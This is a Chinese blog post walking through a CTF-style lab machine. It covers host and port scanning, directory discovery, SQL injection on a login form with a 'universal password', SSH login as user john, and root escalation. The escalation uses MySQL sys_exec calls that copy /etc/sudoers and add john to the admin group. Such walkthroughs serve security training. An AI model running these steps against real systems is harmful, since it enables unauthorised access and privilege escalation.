网络空间安全(羊)2

最新推荐文章于 2024-05-12 05:59:42 发布
最新推荐文章于 2024-05-12 05:59:42 发布
阅读量582 收藏 8
点赞数 5
分类专栏: 笔记 ctf 文章标签: 数据库 linux centos 安全 http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441727/article/details/118002158
版权
笔记 同时被 2 个专栏收录
72 篇文章 17 订阅
订阅专栏
ctf
9 篇文章 4 订阅
订阅专栏

扫描靶机

 netdiscover -r 靶机IP网段

在这里插入图片描述

nmap -sV 靶机IP

在这里插入图片描述

发现了80端口,可能存在网页

我们通过dirb对靶机进行隐藏网页进行探查

dirb http://靶机IP:端口

在这里插入图片描述

发现一个网页打开

在这里插入图片描述

需要用户名和密码

我们优先进行弱密码和判断是否存在注入点

启动burpsuite,修改设置

在这里插入图片描述

在这里插入图片描述

创建监听端口

在这里插入图片描述

进入burpsuite,修改监听端口或者创建add

在这里插入图片描述

开启监听

在这里插入图片描述

输入用户和密码,把数据导入到Repeater

在这里插入图片描述

判断是否存在注入点

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

发现密码处出现明显的改变,存在注入点。

输入万能密码
在这里插入图片描述

发现需要找到用户

可以通过w3af或者其他方式爆破出来

这里发现了john用户,然后配合万能密码登入

在这里插入图片描述

现在显示出john的密码,我们可以进行ssh登录

然后进行脱shell处理

在这里插入图片描述

进入后寻找有用的文件。这里发现了有login的php,进行查看。

在这里插入图片描述## 发现root密码为空

在这里插入图片描述

进入数据库

在这里插入图片描述

拷贝/etc/sudoers文件至tmp目录下

sqlselect sys_exec(“cat /etc/sudoers > /tmp/sudoers”)

在这里插入图片描述

赋予文件/tmp/suduers的拥有者为john

select sys_exec(“chown john /tmp/sudoers”)     
不加你看不了,这个文件可以看拥有sudo权限的组

在这里插入图片描述
在这里插入图片描述

查看文件

在这里插入图片描述

发现admin组具有sudo权限

进行提权,把john划分到admin组

select sys_exec(“usermod -a -G admin john”)

然后sudo su root 提权至root用户

在这里插入图片描述

Marx_Otto
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
2022年江西省中职组“网络空间安全”赛项模块B--应用服务漏洞扫描与利用解析(ssh私钥)
Aluxian_的博客
01-13 1634
2022年中职组山西省“网络空间安全”赛项B-3:应用服务漏洞扫描与利用 一、竞赛时间 8:00—11:00 共计3小时 二、竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第①阶段: 单兵模式系统渗透测试 任务一: 系统漏洞利用与提权 任务二: Linux操作系统渗透测试 任务三: 应用服务漏洞扫描与利用 任务四: SQL注入测试(PL) 任务五: 应急响应 任务六: 流量分析 任务七: 渗透测试 任务八: Web渗透测试 任务九:Windows操作系统渗透测试 任务十: 网页渗透 备战阶段
云演 CTF刷题:模拟了个解答
11-21 2205
云演 CTF实验:模拟了个
【网络安全】经典靶场实战:从信息收集到提权的全过程
HBohan的博客
03-20 4894
前言 本次采用Tr0ll经典项目作为靶场,模拟互联网环境,演示从信息收集到最后提权的全过程。本次实验所涉及到的技术有端口扫描、流量分析、文件分析、hydra爆破、各种反弹shell、稳定shell、计划任务反弹shell(提权),公私钥互碰等一系列基本操作,适合入门不久的初学者练习。 攻击机:192.168.160.3 受害机:192.168.160.7 一、信息收集 1、全端口扫描 nmap -p- 192.168.160.7 发现开放21、22、80端口 2、nmap详细扫描 nmap -sS -s
网络空间安全)实战实例
weixin_45441727的博客
06-17 671
扫描靶机 netdiscover -r 靶机IP网段 nmap -sV 靶机IP 发现了80端口,可能存在网页 我们通过dirb对靶机进行隐藏网页进行探查 dirb http://靶机IP:端口 发现一个网页打开 需要用户名和密码 我们优先进行弱密码和判断是否存在注入点 启动burpsuite,修改设置 创建监听端口 进入burpsuite,修改监听端口或者创建add 开启监听 输入用户和密码,把数据导入到Repeater 判断是否存在注入点 发现密码处出现明显的改变,存
2024年网络安全最新Windows提权方法简单总结_systminfo ,根据系统补丁提权,真的太香了
最新发布
2401_84544780的博客
05-12 1001
写了好多天的windows与linux提权技巧,现在做下简单的总结。提权是后渗透重要的一环节,在权限较低的情况下,我们在进行一些操作如读取/写入敏感文件、权限维持等会受到束缚,所以需要提权。在实际中我们会碰到工作组和域环境,工作组环境我们提权的目的是从普通用户权限到管理员或者system权限。而域环境中我们通常是从域用户到域管理员权限。
Windows提权方法简单总结_systminfo ,根据系统补丁提权
2401_84296945的博客
04-26 694
写了好多天的windows与linux提权技巧,现在做下简单的总结。提权是后渗透重要的一环节,在权限较低的情况下,我们在进行一些操作如读取/写入敏感文件、权限维持等会受到束缚,所以需要提权。在实际中我们会碰到工作组和域环境,工作组环境我们提权的目的是从普通用户权限到管理员或者system权限。而域环境中我们通常是从域用户到域管理员权限。
关注宝宝居家安全.docx
10-01
犬等大型或具有攻击性的犬种...通过以上这些安全策略,我们可以尽可能地减少宝宝在居家环境中的潜在危险,为他们创造一个安全的成长空间。作为父母,时刻保持警惕,了解并采取适当的预防措施,是保障宝宝安全的关键。
全球未来网络发展白皮书(2020版)-V8.9.pdf
08-21
它强调了未来网络在国家的战略地位,尤其是在网络空间日益重要的今天,它已成为继陆、海、空和太空之后的第五疆域。近年来,我国在政策、技术、产业和应用层面的未来网络发展取得了显著成就,通过连续举办的未来网络...
大学校园安全教育.pptx
10-14
本讲座主要涵盖以下几个方面:疾病防疫、饮食卫生、自然灾害、公共安全、意外伤害、交通安全、消防安全以及网络信息安全。以下是这些关键领域的详细说明: **第一部分:疾病防疫** 1. **传染病定义**:传染病是由...
锈网络研讨会
03-03
4. **安全性**:通过Rust编写网络应用时如何确保内存安全,避免常见漏洞,以及如何处理跨站脚本(XSS)和跨站请求伪造(CSRF)等网络安全问题。 5. **Rust与C#的对比**:在性能、开发效率和安全性方面,Rust与C#的...
业务安全演变和解决之道.pptx
10-12
这些威胁不仅限于网络空间,还延伸到了现实生活,如恶意注册、网络诈骗、黄赌毒引流等。业务安全的对手专业化程度高,且进入门槛低,这使得网络犯罪活动持续升级,对业务安全构成严重挑战。 其次,威胁的智能化体现...
了个1.0(第一关)
m0_73265646的博客
10-07 1395
了个”第一关c语言代码。
Linux通过第三方应用提权实战总结
zhangge3663的博客
02-20 1541
Linux提权,前提是拿到了一个低权限的账号,能上传和下载文件,主要思路有: 1、内核提权。网上各种大佬的payload很多,关键在于要能找到利用哪个exp以及具体如何利用。省力点的方法是用searchsploit或者linux-exploit-suggester.sh来查找,熟悉之后难度也不大。 2、suid提权。这里也包含了sudo这种方式,两种方法的思路都是一样的,区别在于suid针对单个程序,sudo针对某个用户。这类提权方式的主要思路是:管理员授权普通用户去执行 root 权限的操作,而不需要
了个通关攻略
qq_42713455的博客
09-15 2234
了个通关攻略
Linux之用户管理命令
qq_44715376的博客
07-05 2833
添加用户时,默认会在/home目录生成一个和用户名同名的用户的家目录。
linux usermod -aG命令:将用户添加到某个组group
学亮编程手记
02-21 8695
添加用户user1到组group1里。 usermod -a -G group1 user1
Linux常用命令之用户-权限-系统管理
xcstruggle的博客
06-20 226
前言 本文内容是曾经学习过程中收录整理的,方便学习使用,不足之处,望请包涵指教。 一》用户,权限管理 whoami: 查看当前系统当前账号的用户名 who: 查看当前所有登录系统的用户信息 常用选项: 选项 含义 -m或am I 只显示运行who命令的用户名、登录终端和登录时间 -q或–count 只显示用户的登录账号和登录用户的数量 -u或–heading 显示列标题 exit: 退出登录账户,若为图形界面,退出当前终端;若是ssh远程登录,退出登录账户;若是切换后
Vulnhub系列-Kioptrix-Level-4
Yasso的博客
12-20 1854
靶机:192.168.249.133 kali:192.168.249.132 一、信息收集 nmap -sV 192.168.249.133 —查看开放端口 —查看下80端口— —是个登录框可能猜测sql注入漏洞— —在用户名和密码处*标记,sqlmap跑一下 sqlmap -r 1.txt --level 3 -risk 2 --batch -D members -T members -C password,username --dump—爆出用户名john密码MyNameIsJohn ssh
kioptrix4(SQL注入漏洞,limited shell)
m0_66299232的博客
10-31 782
下载后操作:将靶机3的kioptrix3.vmx复制到4里,然后打开kioptrix3.vmx文件,把kioptrix3全部替换成kioptrix4_vmware保存即可!5.ps -ef查看下进程,发现mysql是以root身份开启的,正常是以mysql开启的,应该是要调用系统命令的。2.echo $SHELL 查看当前系统默认的shell ,去谷歌查报错,发现是limited shell。4.把用户输入john 密码为' or 1=1 # 成功登录,得到密码MyNameIsJohn。
黑客防线2014年5期刊载:漏洞分析与安全研究
"黑客防线2014年5期杂志涵盖了多个信息安全领域...这些文章为读者提供了丰富的信息安全知识,涵盖了漏洞分析、利用方法、系统安全以及恶意软件行为等多个层面,对于网络安全从业者和研究者来说,是一份宝贵的学习资料。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值